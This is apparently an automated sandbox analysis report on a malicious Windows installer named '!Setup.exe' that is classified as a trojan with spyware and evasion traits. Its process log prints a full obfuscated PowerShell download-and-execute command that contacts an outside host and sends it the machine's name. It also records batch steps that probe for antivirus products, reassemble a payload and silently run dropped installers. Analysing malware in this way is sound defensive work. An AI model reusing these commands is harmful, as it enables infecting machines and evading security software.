Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044D1

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

0_2_004038AF

Source: C:\Users\user\Desktop\!Setup.exe	File created: C:\Windows\HimselfIntelligent	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	File created: C:\Windows\AuthorLo	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	File created: C:\Windows\ReviewedRemoved	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	File created: C:\Windows\ShadesWendy	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	File created: C:\Windows\EnemyReporters	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	File created: C:\Windows\AnyGps	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	File created: C:\Windows\DistinctionTable	Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_0040737E	0_2_0040737E
Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_00406EFE	0_2_00406EFE
Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_004079A2	0_2_004079A2
Source: C:\Users\user\Desktop\!Setup.exe	Code function: 0_2_004049A8	0_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Code function: 21_2_01731EE0	21_2_01731EE0
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Code function: 21_2_01731140	21_2_01731140
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Code function: 21_2_017316B0	21_2_017316B0

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\243714\Publisher.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe 36E2B9BAA6A42E568DA06872089A66ACFB533B14DCF52568D061F51A606BD59F

Source: C:\Users\user\Desktop\!Setup.exe

Code function: String function: 004062CF appears 58 times

Source: !Setup.exe

Static PE information: invalid certificate

Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.18.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.20.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: 9G18T8ZC0J1TEEA21J35VVJ53B.exe.12.dr	Static PE information: Number of sections : 11 > 10
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.18.dr	Static PE information: Number of sections : 11 > 10
Source: 9G18T8ZC0J1TEEA21J35VVJ53B.tmp.20.dr	Static PE information: Number of sections : 11 > 10

Source: !Setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@81/35@5/3

Source: C:\Users\user\Desktop\!Setup.exe

0_2_004044D1

Source: C:\Users\user\Desktop\!Setup.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp

File created: C:\Users\user\AppData\Roaming\UltraMedia

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5980:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03

Source: C:\Users\user\Desktop\!Setup.exe

File created: C:\Users\user\AppData\Local\Temp\nsg50CE.tmp

Jump to behavior

Source: !Setup.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'

Source: C:\Users\user\Desktop\!Setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: C:\Users\user\Desktop\!Setup.exe

File read: C:\Users\user\Desktop\!Setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\!Setup.exe "C:\Users\user\Desktop\!Setup.exe"
Source: C:\Users\user\Desktop\!Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hawaii Hawaii.cmd & Hawaii.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 243714
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Applied
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "surround" Somehow
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Directors + ..\Tongue + ..\Banks + ..\Convenient + ..\Mainland + ..\Abilities + ..\Mainstream L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\243714\Publisher.com Publisher.com L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Process created: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe "C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe"
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Process created: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp "C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp" /SL5="$40472,11205210,845824,C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe"
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe "C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Process created: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp "C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp" /SL5="$50472,11205210,845824,C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\timeout.exe "timeout" 9
Source: C:\Windows\System32\timeout.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe "C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe"
Source: C:\Users\user\Desktop\!Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hawaii Hawaii.cmd & Hawaii.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 243714	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Applied	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "surround" Somehow	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Directors + ..\Tongue + ..\Banks + ..\Convenient + ..\Mainland + ..\Abilities + ..\Mainstream L	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\243714\Publisher.com Publisher.com L	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Process created: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe "C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Process created: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp "C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp" /SL5="$40472,11205210,845824,C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe "C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Process created: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp "C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp" /SL5="$50472,11205210,845824,C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\timeout.exe "timeout" 9
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"

Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\!Setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
